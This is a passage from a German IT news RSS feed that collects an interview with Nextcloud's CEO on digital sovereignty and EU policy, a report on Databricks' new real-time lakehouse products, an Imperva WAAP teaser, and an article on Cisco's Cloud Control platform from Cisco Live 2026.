<p>Auf dem <a href="https://nextcloud.com/summit/" target="_blank" rel="noreferrer noopener">Nextcloud Summit</a> in München sprach die Computerworld mit Karlitschek über die Dynamik rund um digitale Souveränität, die Vorschläge der Europäischen Kommission im Rahmen des „Tech Sovereignty Package“ und die zukünftige Entwicklung von Nextcloud.</p>



<h2 class="wp-block-heading">„Das Interesse an Open Source wächst kontinuierlich“</h2>



<p><em>Als Nextcloud gegründet wurde, gab es in Europa einen starken Trend weg von On-Premises-Software hin zu US-amerikanischen Cloud-Anbietern. Wie haben sich die Einstellung gegenüber Open Source und das Bewusstsein für alternative Anbieter seitdem verändert?</em></p>



<p><strong>Frank Karlitschek</strong>: Ich beschäftige mich seit den 1990er-Jahren mit Open Source. Damals war das vor allem ein Thema für eine kleine Gruppe von Nerds – Menschen, denen Software und Kontrolle darüber wirklich wichtig waren. Der Gedanke der Souveränität war dabei schon immer zentral. Genau darum geht es bei Open Source: Man kann verstehen, was die Software tut, sie überall einsetzen, untersuchen und verändern.</p>



<p>Damals war das sehr nischig, aber seitdem wächst das Interesse kontinuierlich. Es gab einige Schlüsselmomente, die das Wachstum beschleunigt haben, beispielsweise die Snowden-Enthüllungen, die Diskussionen um die DSGVO und bestimmte gesetzliche Regelungen. Und dann natürlich die aktuelle geopolitische Lage.</p>



<p>Ich persönlich finde es interessant, dass sich das Thema, das einst eher für Softwareentwickler interessant war, zu einem geopolitischen Thema entwickelt hat. Heute treffe ich hochrangige Politiker, denen das Thema mittlerweile sehr am Herzen liegt. Es wird nicht unbedingt Mainstream, aber immer mehr Menschen verstehen die Bedeutung.</p>



<p><em>Hat sich auch die Gesprächsebene verändert?</em></p>



<p><strong>Karlitschek</strong>: Zu Beginn von Nextcloud sprachen wir hauptsächlich mit IT-Managern, die nach einer Lösung suchten. Sie interessieren sich dafür, wie es funktioniert, für den Preis und technische Aspekte.</p>



<p>Heute sprechen wir zunehmend auch mit Führungskräften auf C-Level. Das Thema ist Teil der Unternehmensstrategie geworden. Die Unternehmen fragen sich: Welche Abhängigkeiten haben wir? Welche Lösung passt langfristig zur Strategie des Unternehmens?</p>



<p>Früher war Software eher eine austauschbare Ware. Heute ist sie ein strategischer Faktor für Unternehmen. Das finde ich sehr interessant.</p>



<p><em>In den letzten Jahren gab es großes Interesse am Thema digitale Souveränität. Inwieweit schlägt sich dies in konkreten Migrationen weg von US-amerikanischen Cloud-Anbietern nieder?</em></p>



<p><strong>Karlitschek: </strong>Das Interesse ist riesig. Alle reden darüber, viele Menschen und Organisationen kommen auf uns zu. Allerdings setzen noch nicht alle entsprechende Maßnahmen um – viele erkunden zunächst die Optionen.</p>



<p>Natürlich hoffen wir, dass daraus in den nächsten Monaten konkrete Projekte entstehen. Momentan wird noch viel diskutiert und analysiert. Unser Kundenstamm wächst bereits stark, aber das Interesse ist im Verteidigungsbereich, im Bildungswesen sowie in regulierten Märkten wie dem Gesundheitswesen oder dem Finanzsektor noch deutlich größer.</p>



<p><em>Ist die Nachfrage nach souveräner Technologie aus Ihrer Sicht nur eine Reaktion auf die aktuelle geopolitische Situation oder handelt es sich um einen langfristigen strukturellen Wandel?</em></p>



<p><strong>Karlitschek</strong>: Ich halte es für einen langfristigen Trend. In den 1990er-Jahren war IT für viele Unternehmen noch etwas Nebensächliches. Wichtig war nur, dass Drucker und Faxgeräte funktionierten. Strategisch war das Thema kaum relevant.</p>



<p>Dann kam um das Jahr 2000 der große Cloud-Trend. Das Versprechen lautete immer: Auslagern spart Geld.</p>



<p>Heute erkennen Unternehmen, dass IT nicht einfach ignoriert werden kann. Ich glaube nicht, dass alles wieder zurück ins eigene Rechenzentrum wandert. Aber die Menschen kümmern sich wieder stärker darum. Sie verstehen, dass IT nicht einfach wie Wasser oder Strom aus der Steckdose kommt.</p>



<p>Themen wie Vendor Lock-in, Kosten, Industriespionage und Wettbewerbsfähigkeit spielen eine große Rolle. Mit Open Source ist man flexibler. Deshalb wird die strategische Bedeutung dieses Themas weiter zunehmen.</p>



<h2 class="wp-block-heading">“Gültigkeit für ein Prozent des Marktes ist zu wenig”</h2>



<p><em>Die Europäische Kommission hat kürzlich ihr ‚Tech Sovereignty Package‘ inklusive Open-Source-Strategie veröffentlicht. Reichen diese Vorschläge aus?</em></p>



<p><strong>Karlitschek</strong>: Ich fnde die Vorschläge großartig.Ehrlich gesagt war ich überrascht, dass man so gut zugehört hat. Die eigentliche Herausforderung besteht jetzt darin, die Vorschläge tatsächlich umzusetzen. Die Problembeschreibung und die vorgeschlagenen Lösungen sind sehr gut, aber daraus muss noch verbindliches Recht werden.</p>



<p><em>Würden Sie vor der Verabschiedung noch Änderungen an den Vorschlägen vornehmen?</em></p>



<p><strong>Karlitschek: </strong>Aktuellgibt es vier Risikostufen. In der höchsten werden nur Open-Source- und europäische Lösungen akzeptiert. Das betrifft aber nur ein Prozent des Marktes. Ich hoffe, dass künftig besser verstanden wird, dass sich mehr als ein Prozent stärker darum kümmern sollte.</p>



<p>Wenn eine Anwendung völlig unkritisch ist und keine personenbezogenen Daten enthält, dann ist es vielleicht völlig in Ordnung, Anbieter außerhalb der EU zu nutzen. Aber sobald Sie Anforderungen der DSGVO, Spionageschutz, keine Anbieterabhängigkeit und so weiter beachten müssen, sollte die höchste Anforderungsstufe deutlich häufiger angewendet werden.</p>



<p><em>US-Unternehmen versuchen, auf die Bedenken europäischer Kunden einzugehen, etwa mit als „souverän“ vermarkteten Cloud-Diensten und Joint Ventures mit europäischen Anbietern. Wo ziehen Sie die Grenze zwischen echter Souveränität und Sovereignty Washing?</em></p>



<p><strong>Karlitschek: </strong>Souveränität hat natürlich verschiedene Dimensionen. Betrachtet man jedoch allein das Problem des CLOUD Act, der ausländischen Behörden uneingeschränkten Zugriff auf die Daten hier gewährt, dann reicht es nicht aus, einfach europäische Rechenzentren zu betreiben. Im CLOUD Act steht ausdrücklich, dass die Regelung auch für europäische Rechenzentren oder Tochtergesellschaften gilt.</p>



<p>Microsoft versucht beispielsweise mit seinem Delos-Modell eine Lösung zu finden: Das Unternehmen gehört SAP und Microsoft liefert lediglich die Software. Aber selbst dann besteht diese Abhängigkeit, denn Software benötigt Updates und Sicherheits-Patches. Wenn diese nicht verfügbar sind oder jemand eine Hintertür einbaut, dann haben Sie immer noch ein Problem.</p>



<p>Deshalb bemüht sich Microsoft sehr intensiv um Lösungen, aber das Problem lässt sich nicht leicht umgehen.</p>



<h2 class="wp-block-heading">“Die Produktstrategie wird sich nicht wesentlich ändern”</h2>



<p><em>Blicken wir auf die Produktstrategie. Wie sieht die Zukunft von Nextcloud aus?</em></p>



<p><strong>Karlitschek</strong>: Die grundlegende Produktstrategie wird sich nicht wesentlich ändern. Unser Ziel bleibt es, eine hochmoderne Kollaborationssoftware anzubieten die Open Source ist – jedoch mit deutlich mehr Kontrolle, Sicherheit und Schutz – und unabhängig davon, wo Sie sie hosten.</p>



<p>Gleichzeitig kommen jetzt neue Faktoren dazu, insbesondere der Einfluss von KI, die wir mit unserer Agentenstrategie nutzen wollen.</p>



<p>In Zukunft werden Sie vielleicht weiterhin eine Oberfläche auf klassische Weise nutzen, indem Sie Dokumente öffnen, Text eingeben und so weiter. Es gibt jedoch auch viele Vorgänge, die in Zukunft mit KI automatisiert werden können.</p>



<p>Ein weiterer Aspekt ist, dass KI die Entwicklung darauf aufbauender kundenspezifischer Software erheblich vereinfacht. Dadurch wird es deutlich mehr maßgeschneiderte Unternehmenssoftware geben.</p>



<p>Das wollen wir mit unserem ISV-Programm nutzen. Die Softwareentwicklung wird einfacher, aber Unternehmen möchten keine beliebige Software einsetzen, sondern etwas, das getestet, zertifiziert und sicher ist und für das jemand verantwortlich ist. Genau das kann Nextcloud bieten. (mb)</p>



<p><em>Dieser Artikel basiert auf einem <a href="https://www.computerworld.com/article/4184628/nextcloud-ceo-open-source-moves-from-a-nerdy-audience-to-the-geopolitical-stage.html" target="_blank">Beitrag </a>der Schwesterpublikation Computerworld.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Databricks says it solved the decades-old data pipeline problem that's been slowing AI agents]]></title>
<description><![CDATA[For decades, data professionals have struggled with the challenge of managing both operational and analytical databases in a unified approach that doesn't introduce latency and performance degradation.Agents made the problem structural. A system that reasons continuously and acts on live data can...]]></description>
<link>https://tsecurity.de/de/3603131/it-nachrichten/databricks-says-it-solved-the-decades-old-data-pipeline-problem-thats-been-slowing-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603131/it-nachrichten/databricks-says-it-solved-the-decades-old-data-pipeline-problem-thats-been-slowing-ai-agents/</guid>
<pubDate>Tue, 16 Jun 2026 22:47:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>For decades, data professionals have struggled with the challenge of managing both operational and analytical databases in a unified approach that doesn't introduce latency and performance degradation.</p><p>Agents made the problem structural. A system that reasons continuously and acts on live data cannot tolerate a pipeline between itself and the information it needs to act on.</p><p>At the Data + AI Summit on Tuesday, Databricks announced two products aimed at collapsing that infrastructure. Lakehouse//RT delivers millisecond query latency directly on governed Delta and Iceberg tables, eliminating the dedicated real-time serving tier that enterprises have maintained alongside their lakehouses. LTAP, short for Lake Transactional/Analytical Processing, stores Postgres-native transactional data in Delta and Iceberg format from the point of write, removing the ETL pipelines that have connected operational and analytical systems for decades.</p><p>Reynold Xin, co-founder of Databricks, described a simpler data stack as "the holy grail for agents" in a briefing with VentureBeat, arguing that as users vibe code more applications, the agents reasoning analytically on top of those apps need the underlying infrastructure out of the way to move fast. </p><p>"The agents really prefer a much simpler stack, because they can move way faster," he said.</p><h2>LTAP bets on storage-layer unification where HTAP tried engine convergence</h2><p>Many vendors have tried various approaches over the decades to unify analytical and transactional data.</p><p>Back in 2014, analyst firm Gartner coined the term HTAP, an acronym that stands for Hybrid Transactional/Analytical Processing as a way to describe  vendors that attempted to unify the two types of databases. Vendors including MemSQL (now known as<a href="https://venturebeat.com/data-infrastructure/singlestore-ceo-sees-little-future-for-purpose-built-vector-databases"> SingleStore</a>) SAP HANA and Oracle's<a href="https://venturebeat.com/ai/oracle-mysql-heatwave-lakehouse-goes-ga-to-query-data"> MySQL Heatwave</a> are among many HTAP vendors in the market.</p><p>LTAP is Databricks' answer to HTAP, using the Lakebase architecture to unify data at the storage layer rather than the engine level.<a href="https://venturebeat.com/data/databricks-serverless-database-slashes-app-development-from-months-to-days"> Lakebase</a> is Databricks' serverless cloud-based PostgreSQL database service that became generally available in February.</p><p>"HTAP to us is kind of more of a failure of the industry rather than a success," Xin said. </p><p>The LTAP approach goes to the storage layer instead of the query layer. Lakebase previously stored Postgres data in Postgres format on object storage, requiring conversion before the Lakehouse's analytical engines could use it efficiently. With LTAP, transactional data lands directly in Delta or Iceberg format, sharing the same copy that analytical workloads read. Postgres remains the transactional engine. Spark and the Lakehouse remain the analytical engine.</p><p>"The whole point is, hey, you use the best tool for the job at the query engine level, we just make sure underlying storage is a single copy of the data," Xin said.</p><p>The central engineering challenge is latency. Object storage carries response times in the seconds range, far too slow for OLTP workloads that require sub-millisecond performance. Lakebase handles this through a caching layer between Postgres compute instances and object storage. The key design decision is where the column conversion happens: idle CPU capacity in that caching layer performs the row-to-column conversion before data lands in object storage. </p><p>"When you convert data from row to column, it compresses more than 10 times, typically, so now you substantially reduce the network cost of that basic caching layer between that caching layer and the object stores," Xin said.</p><h2>Lakehouse//RT delivers millisecond query latency on live lakehouse data without a separate serving tier</h2><p>Lakehouse//RT is Databricks' answer to the dedicated real-time serving tier — the separate system enterprises have maintained alongside their lakehouses to handle low-latency queries, at the cost of data copies, split governance and pipeline complexity agents cannot work around. Key capabilities of Lakehouse//RT include:</p><p><b>Reyden compute engine:</b> Built specifically for high-concurrency, low-latency serving, Reyden queries Delta and Iceberg tables directly without moving data out of the lakehouse.</p><p><b>Latency and throughput:</b> Lakehouse//RT delivers sub-100ms latency at 12,000 queries per second, with response times as low as 10ms on smaller datasets and up to 16x better performance than existing dedicated serving stacks.</p><p><b>Governance and data access:</b> Every query runs within Unity Catalog's governance framework with no separate permissions layer, no data copies and no ingestion pipelines.</p><div></div><h2>Analysts see the agentic framing and open format approach as the real differentiators</h2><p>The problem both products address is well-documented among enterprise data teams, but analysts draw a distinction between the pain point and the specific claim Databricks is making.</p><p>"Enterprises have had HTAP, streaming, cloud warehouses, and operational stores for years," Stephanie Walter, Practice Leader for AI Stack at HyperFRAME Research, told VentureBeat. "What is different is the agentic AI framing."</p><p>Walter noted that agents need live operational data, historical context, governance, retrieval, and write-back in the same workflow. </p><p>"That is a strong architecture argument, but Lakebase still has to prove it can meet the latency, reliability, and operational maturity CIOs expect," she said.</p><p>Mike Leone, analyst at Moor Insights and Strategy, said the path to genuine differentiation is more specific than the unification concept itself. He also noted that open analytics on a data lake is table stakes now, with many vendors providing some sort of service.</p><p>"The less common move is letting the transactional writes land in open formats too, so the operational database isn't sitting in a proprietary box while only the analytics half is open, "Leone told VentureBeat. </p><p>He added that the open format approach, paired with Lakehouse//RT querying live data directly off the lake, is what gives the architecture a credible case for retiring a whole row of specialized systems.</p><p>The technical claim that will face the most scrutiny is also the most central one. "The piece I'd still want their engineers to walk through is how both engines truly share one copy without a quiet conversion step doing the syncing in the middle," Leone said.</p><h2>What this means for enterprises</h2><p>For data engineers evaluating their stack for agentic workloads, the question is no longer which best-of-breed tool to run for each job — it's whether running separate tools at all is still defensible.</p><p><b>Enterprises that built separate operational databases, real-time serving tiers and analytical lakehouses could previously treat the gaps between them as a maintenance burden.</b> Agents surface those gaps as an operational risk: a system reasoning across governance boundaries will find the inconsistencies faster than any human team. </p><p><b>The market is moving away from specialized serving layers faster than most vendor roadmaps anticipated. </b>According to <a href="https://venturebeat.com/data/the-retrieval-rebuild-why-hybrid-retrieval-intent-tripled-as-enterprise-rag-programs-hit-the-scale-wall">VB Pulse Q1 2026</a>, a three-wave longitudinal survey of 100-plus employee organizations, hybrid retrieval intent tripled from 10.3% to 33.3% across the quarter while standalone vector database adoption declined across every tracked vendor. The same consolidation logic is now hitting the real-time serving tier.

<b>The traditional approach — best-of-breed tools for each workload type, pipelines between them — was built for human-speed analytical consumption.</b> Agent workloads don't tolerate that architecture. </p><p>"The pain they're pointing at, all the copying and syncing between operational and analytical systems, is real and expensive, and anyone running this at scale feels it," Leone said.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best WAAP Solutions for Enterprise Application Security: How to Choose the Right Platform in 2026]]></title>
<description><![CDATA[Key Takeaways The major enterprise WAAP solutions evaluated in this guide are Akamai, Cloudflare, F5, Fastly, Fortinet, Imperva, and Radware. In the most recent independent benchmarks, Akamai, Cloudflare, and Imperva were named Leaders in the Forrester Wave: Web Application Firewall Solutions, Q1...]]></description>
<link>https://tsecurity.de/de/3602658/it-security-nachrichten/best-waap-solutions-for-enterprise-application-security-how-to-choose-the-right-platform-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602658/it-security-nachrichten/best-waap-solutions-for-enterprise-application-security-how-to-choose-the-right-platform-in-2026/</guid>
<pubDate>Tue, 16 Jun 2026 19:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways The major enterprise WAAP solutions evaluated in this guide are Akamai, Cloudflare, F5, Fastly, Fortinet, Imperva, and Radware. In the most recent independent benchmarks, Akamai, Cloudflare, and Imperva were named Leaders in the Forrester Wave: Web Application Firewall Solutions, Q1 2025, while Akamai, Fortinet, and Imperva placed in the Leader category of the […]</p>
<p>The post <a href="https://www.imperva.com/blog/best-waap-solutions/">Best WAAP Solutions for Enterprise Application Security: How to Choose the Right Platform in 2026</a> appeared first on <a href="https://www.imperva.com/blog">Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Jeetu Patel Cisco bis zur Unkenntlichkeit verändert hat]]></title>
<description><![CDATA[width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px">Ciscos Chief Product Officer Jeetu Patel auf der Cisco Live US 2026Cisco



Auf der Cisco Live 2026 war es Zeit für Jeetu Patel, Chief Product Officer von Cisco, ein vor 24 Monaten gegebenes Versprechen einzulösen. Zwei Jah...]]></description>
<link>https://tsecurity.de/de/3602096/it-security-nachrichten/wie-jeetu-patel-cisco-bis-zur-unkenntlichkeit-veraendert-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602096/it-security-nachrichten/wie-jeetu-patel-cisco-bis-zur-unkenntlichkeit-veraendert-hat/</guid>
<pubDate>Tue, 16 Jun 2026 16:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"> width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Ciscos Chief Product Officer Jeetu Patel auf der Cisco Live US 2026</p><br></figcaption></figure><p class="imageCredit">Cisco</p></div>



<p>Auf der <a href="https://www.ciscolive.com/" target="_blank" rel="noreferrer noopener">Cisco Live 2026</a> war es Zeit für <a href="https://www.linkedin.com/in/jeetupatel" target="_blank" rel="noreferrer noopener">Jeetu Patel</a>, Chief Product Officer von Cisco, ein vor 24 Monaten gegebenes Versprechen einzulösen. Zwei Jahre zuvor hatte der Manager versprochen, dass <a href="https://www.cisco.com/">Cisco</a> in zwei Jahren  kaum wiederzuerkennen sein würde – im positiven Sinne, versteht sich.</p>



<p>Die auf der Veranstaltung vorgestellten Innovationen lassen darauf schließen, dass er sein Versprechen tatsächlich weitgehend eingelöst hat. Cisco positioniert sich neu: weg von einer Holding-Gesellschaft für Produkte und Dashboards hin zu einer einheitlichen, KI-nativen Infrastrukturplattform. Dabei fungiert Cloud Control als Steuerungsebene, Cisco IQ als CX-Zentrum und Secure Networking als verbindendes Element.</p>



<p>Dieser Wandel betrifft nicht nur neue Funktionen, sondern ein völlig neues Betriebsmodell. Cisco schafft eine Umgebung, in der sich menschliche Administratoren und KI-Agenten dieselben Daten, denselben Kontext und dieselben Handlungsmöglichkeiten teilen, wobei die Menschen die Kontrolle behalten.</p>



<h2 class="wp-block-heading">Vom Dashboard-Wust zu Cloud Control</h2>



<p>Der sichtbarste Beweis für das „neue“ Cisco ist <strong>Cloud Control</strong>, eine einheitliche Management-Plattform für Networking, Security, Compute, Observability, Collaboration und ein wachsendes Ökosystem von Drittanbieter-Tools. Cisco betont, dass es sich hierbei nicht nur um eine weitere zentrale Übersicht handelt. Stattdessen ist es  eine aktive Ausführungsumgebung, in der Richtlinien und Identitäten direkt in den Steuerungsprozess integriert sind. Die Plattform wurde von Grund auf dafür konzipiert, dass Menschen und KI-Agenten die Infrastruktur gemeinsam betreiben.</p>



<p>Wenn sich Betreiber in Cloud Control anmelden, sehen sie eine vertraute, ChatGPT-ähnliche Oberfläche mit drei Modi:</p>



<ul class="wp-block-list">
<li><strong>„Assistant“</strong> ermöglicht es Betreibern, mit der Plattform in natürlicher Sprache zu kommunizieren.</li>



<li><strong>„Canvas“</strong> bietet einen Arbeitsbereich für mehrere Nutzer, in dem Menschen und Agenten gemeinsam Probleme untersuchen und lösen können.</li>



<li><strong>„Actions“</strong> fungiert als Leitstelle zur Überwachung dessen, was Agenten vorschlagen und ausführen.</li>
</ul>



<p>Cloud Control stellt zudem gemeinsame Plattformdienste wie Bestands- und Topologieinformationen über die gesamte Cisco-Infrastruktur hinweg bereit. Meraki, Intersight, Sicherheitsdienste, Splunk, Webex Control Hub und Cisco IQ sind alle mit einem einzigen Login zugänglich. Damit entfällt der Wechsel zwischen mehreren Dashboards und Authentifizierungsdomänen, stattdessen können sich die Betreiber nahtlos zwischen Plattformdiensten und Produkterfahrungen innerhalb derselben Umgebung bewegen.</p>



<h2 class="wp-block-heading">Cloud Control als „KI-Harness“, nicht als Konsole</h2>



<p>Technisch basiert Cloud Control auf einer gemeinsamen Datenstruktur, die Telemetriedaten aus Benutzern, Geräten, Anwendungen, Netzwerken und Bedrohungen korreliert. Diese Datenbasis dient sowohl menschlichen Entscheidungen als auch agentengestützter Automatisierung.</p>



<p>Cisco beschreibt diesen Wandel als Übergang von „Infrastructure as Code“ zu „Infrastructure as a Harness“. Anstatt ausschließlich von Menschen geschriebene Skripte und Playbooks zu verwenden, wird Cloud Control zur kontrollierten Umgebung, in der KI-Agenten Systeme beobachten, analysieren und sicher steuern können.</p>



<p>Drei zentrale Komponenten prägen diesen Ansatz:</p>



<ul class="wp-block-list">
<li><strong>„AI Canvas“</strong> bildet den Arbeitsbereich, in dem Menschen und Agenten gemeinsam Vorfälle untersuchen, wobei der Kontext über Schichten und Eskalationen hinweg erhalten bleibt.</li>



<li>Das „<strong>Cloud Control Studio“</strong> ermöglicht Kunden und Partnern, mit Agent Builder und App Buildermithilfe natürlicher Sprache und integrierter Programmierassistenten ihre eigenen Agenten und Anwendungen auf Basis der Daten, Richtlinien und der Steuerungsebene von Cisco zu erstellen .</li>



<li>Der<strong> „Cloud Control Marketplace“</strong> stellt Eigenentwicklungen und Partnerlösungen über einen zentralen Marktplatz zur Verfügung.</li>
</ul>



<p>Aus Sicht von Unternehmen wandelt sich Cloud Control damit von einer Plattform „zum Durchklicken von Einstellungen“ zu einer sicheren Plattform für agentengestützte IT-Prozesse: Eine geregelte Umgebung, in der KI-Agenten durchgängig bereitgestellt, überwacht, eingeschränkt und geprüft werden können. Dies ist ein ganz anderes Konzept als die herkömmliche Netzwerkmanagement-Konsole.</p>



<h2 class="wp-block-heading">Ein gemeinsames „Gehirn“ für Customer Experience und Produkte</h2>



<p>Unter der Leitung von <a href="https://www.linkedin.com/in/lizcentoni/" target="_blank" rel="noreferrer noopener">Liz Centoni</a>, Executive Vice President und General Manager, hat Cisco zudem seine Customer-Experience-Organisation (CX) grundlegend umgebaut. Lange Zeit wirkten die CX- und Produktorganisationen wie zwei Parallelwelten: Services wurden auf Produkte aufgesetzt, statt eng mit deren Funktionsweise verzahnt zu sein. Um diese Lücke zu schließen, arbeitete Centoni eng mit Patel zusammen, um sicherzustellen, dass Produktentwicklung und CX vollständig aufeinander abgestimmt sind.</p>



<p><strong>Cisco IQ</strong> verändert diese Dynamik, indem die modernisierten CX-Funktionen direkt in die gleiche Cloud-Control-Umgebung integriert werden, in der auch die Produkte betrieben werden. Zudem werden die CX-Workflows an dieselbe Telemetrie- und Policy-Ebene angebunden. Bemerkenswert ist dabei, dass Cisco IQ nicht einfach ein weiteres Dashboard ist, sondern ein integraler Bestandteil von Cloud Control.</p>



<p>Cisco IQ ist als KI-gestützte Plattform für Support und Professional Services positioniert. Ziel ist es, Kunden vollständige Transparenz über die gesamte IT-Landschaft, proaktive Ausfallsicherheit, schnellere Problemlösungen und kontextbezogene Services zu bieten. Die Lösung wird als SaaS-Plattform bereitgestellt, kann aber für Kunden mit strengen Anforderungen an Datenhoheit auch On-Premises betrieben werden.</p>



<p>Durch die Nutzung der gemeinsamen Data Fabric kann Cisco:</p>



<ul class="wp-block-list">
<li><strong>IQ Assets</strong> inventarisieren, unabhängig davon, ob sie bereits im Einsatz sind oder sich noch im Lager befinden,</li>



<li>Risiken kennzeichnen, bevor Kunden Probleme erleben, und</li>



<li>die Sicherheitslage eines Unternehmens anhand anonymisierter Vergleichswerte nach Branche, Marktsegment oder Region benchmarken.</li>
</ul>



<p>Neue Funktionen unterstreichen die enge Verzahnung von CX und Produktentwicklung weiter:</p>



<ul class="wp-block-list">
<li>„<strong>Resilient Infrastructure Services</strong>“ nutzt ein dreistufiges Framework aus Expositionsbewertung, Infrastrukturmodernisierung und Verteidigungsresilienz, um Kunden bei der Vorbereitung auf Bedrohungen nach dem „Frontier-Modell“ zu unterstützen.</li>



<li><strong>„Quantum Ready Assessments“</strong>, die über Cisco IQ bereitgestellt werden, identifizieren Systeme, die besonders anfällig für sogenannte „Harvest Now, Decrypt Later“-Angriffe sind, und zeigen einen Weg zu einer quantensicheren Infrastruktur auf.</li>
</ul>



<p>Die Verlagerung des „CX-Gehirns“ in Cloud Control und dessen Anbindung an dieselben Daten- und KI-Modelle, die auch den operativen Betrieb steuern, stellt sowohl kulturell als auch architektonisch einen grundlegenden Wandel dar.</p>



<h2 class="wp-block-heading">Secure Networking als Beweis für die Integration</h2>



<p>Wer verstehen möchte, wie stark das neue Cisco inzwischen integriert ist, sollte sich den Bereich Secure Networking ansehen.</p>



<p>Ciscos Vision besteht darin, Sicherheit direkt in die Infrastruktur einzubetten – vom Silizium über das Netzwerk bis hin zum operativen Betrieb –, statt sie als separaten Technologie-Stack zu behandeln.</p>



<p>Diese Strategie manifestiert sich auf verschiedene, konkrete Weisen.</p>



<p><strong>Live Protect</strong>, intern als „digitales Immunsystem“ bezeichnet, wendet präzise Ausgleichskontrollen auf Cisco-Produkte im Betrieb an, um diese vor neu entdeckten Schwachstellen zur Laufzeit zu schützen. Dies geschieht ohne Neustarts, Upgrades oder Wartungsfenster. Die Kontrollen sind zielgerichtet eingesetzt, um Leistungseinbußen zu vermeiden und Fehlalarme zu minimieren.</p>



<p>Live Protect ist bereits auf Nexus-9000-Switches verfügbar und wird auf das gesamte Portfolio ausgeweitet, einschließlich Campus-Switches, wodurch die Rückkopplungsschleife zwischen der Entdeckung von Schwachstellen und deren Behebung von Wochen auf Minuten verkürzt wird.</p>



<p>Die <strong>Hybrid Mesh Firewall</strong> erweitert einheitliche Sicherheitsrichtlinien über Netzwerke, Anwendungen sowie Firewalls von Cisco und Drittanbietern hinweg und begrenzt so den Schadensumfang, wenn etwas schiefgeht.</p>



<p>Gleichzeitig integriert Cisco Post-Quantum-Krypto-Bibliotheken, Secure Boot und Trust Anchors in sein Kernportfolio und hat sich verpflichtet, bis Dezember 2026 quantensichere Kommunikationsfunktionen für die meisten Kernprodukte bereitzustellen. Neue Router-, Switch- und Firewall-Serien für Unternehmen und Rechenzentren werden als „standardmäßig quantensicher“ auf den Markt gebracht.</p>



<p>All dies wird über Cloud Control orchestriert, laut Cisco die Sicherheitsleitstelle für die Zeit nach Mythos. Dabei stellt Splunk das Telemetrie-Backbone sowie agentenbasierte SOC- und SRE-Funktionen bereit. Auf diese Weise soll es möglich sein, Vorfälle mit maschineller Geschwindigkeit zu erkennen, zu priorisieren und darauf zu reagieren.</p>



<p>Secure Networking ist damit mehr als klassische Firewalls oder SD-WAN. Es bildet das Rückgrat, das Ciscos Netzwerk-, Sicherheits-, Observability- und KI-Ressourcen zu einer einheitlichen Plattform verbindet.</p>



<h2 class="wp-block-heading">Multicloud Fabric: Networking as a Service für KI</h2>



<p>Ein weiteres Kennzeichen des neuen Cisco ist die Bereitschaft, Netzwerke als vollständig verwaltete Fabric bereitzustellen, anstatt Kunden lediglich Werkzeuge in die Hand zu drücken, die selbst zusammenstellen müssen.</p>



<p><strong>„Multicloud Fabric“</strong> veranschaulicht diesen Wandel. Die Lösung wird als Network-as-a-Service-Angebot über Cloud Control bereitgestellt und bietet Unternehmen eine einheitliche Struktur für sicheres Site-to-Cloud- und Cloud-to-Cloud-Networking. Cisco betreibt hierfür virtuelle Points of Presence (PoPs) bei den wichtigsten Cloud-Anbietern und in verschiedenen Regionen.</p>



<p>Kunden können dadurch Standorte und Cloud-Umgebungen einbinden, absichtsbasierte Konnektivität definieren, Sicherheitsrichtlinien zuweisen und die Leistung „mit einem Klick“ über Cloud Control überwachen, anstatt eigene Hub-and-Spoke-Architekturen aufzubauen und zu warten.</p>



<p>Sicherheit und Observability sind integriert – in Form von Zero-Trust-Routing, Cloud-Firewall-Service-Chaining sowie über in jeden Point of Presence eingebettete ThousandEyes-Agenten. Das Netzwerk ist somit nicht länger eine passive Leitung, sondern Teil des KI-Intelligence-Stacks.</p>



<p>Dies gewinnt an Bedeutung, da AI-First-Anwendungen zunehmend Inferenzprozesse über mehrere Clouds und Datenquellen hinweg ausführen. Cisco-eigene Untersuchungen zeigen, dass diese agentenbasierten Workflows ein Vielfaches an Netzwerkverkehr generieren können als manuelle Entsprechungen, wobei es sich bei einem Großteil um latenzempfindliche Inferenz handelt. Multicloud Fabric, das als Service betrieben und in dieselbe Cloud Control-Umgebung integriert ist, ist Ciscos Antwort auf diese neue Realität.</p>



<h2 class="wp-block-heading">Was bedeutet das für Kunden?</h2>



<p>Cisco hat vier Jahrzehnte damit verbracht, branchenführende Produkte zu entwickeln, von Meraki und Nexus bis hin zu Webex und ThousandEyes. Die größte Chance des Unternehmens lag jedoch schon immer darin, wie diese Komponenten zusammenwirken. Nämlich, wie es Patel formuliert, „eng integriert und dennoch lose gekoppelt“.</p>



<p>Cloud Control, Cisco IQ, Multicloud Fabric und Secure Networking deuten darauf hin, dass Cisco diese Lücke zunehmend schließt. Einzelne Dashboards werden zu agentischen Workflows und isolierte Produkte verwandeln sich in ein sicheres Gerüst für das KI-Zeitalter.</p>



<p>Für Kunden ist die Transformation von Cisco von Bedeutung, da sie nicht nur die Produktpalette, sondern auch das Betriebsmodell verändert. Cloud Control bietet IT-Teams eine einheitliche Verwaltungsebene für Netzwerke, Sicherheit, Observability, Zusammenarbeit und Dienste und ersetzt damit die fragmentierte Dashboard-Erfahrung, die für Cisco-Umgebungen lange Zeit eine Bürde waren. Dies dürfte den Betrieb schneller und einfacher machen, setzt aber auch höhere Anforderungen an die Kunden.</p>



